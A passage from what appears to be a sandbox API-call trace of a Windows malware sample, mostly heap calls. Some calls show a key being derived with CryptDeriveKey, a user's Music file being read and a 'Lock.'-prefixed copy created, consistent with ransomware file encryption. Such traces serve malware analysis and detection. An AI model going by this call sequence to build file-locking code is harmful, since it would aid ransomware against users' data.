Flags=0x0, Size=0x10) returned 0x2e51580 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0243.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0243.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0243.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51520 [0243.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51520, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.873] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0243.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0243.874] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa870d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0243.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0243.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0243.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0243.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0243.876] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0243.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0243.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0243.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0243.877] CryptDestroyHash (hHash=0xa870d0) returned 1 [0243.877] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0243.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0243.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.878] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\DePu.wav" (normalized: "c:\\users\\fd1hvy\\music\\depu.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0243.879] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.879] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0243.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0243.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0243.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0243.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x978490 [0243.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0243.880] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0243.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0243.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0243.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0243.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0243.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0243.881] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.DePu.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.depu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0243.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0243.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0243.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0243.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0243.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0243.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0243.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0243.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0243.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0243.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0243.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5b020 [0243.942] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0243.942] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0243.946] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x4dee, lpOverlapped=0x0) returned 1 [0243.947] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0243.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0243.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0243.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2f14010 [0243.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5b020 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0243.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0243.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0243.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2f28e08 [0243.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0243.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.951] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0243.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2f14010 [0243.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0243.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0243.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0243.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0243.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0243.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0243.954] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0243.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0243.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0243.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2f14010 [0243.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0243.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 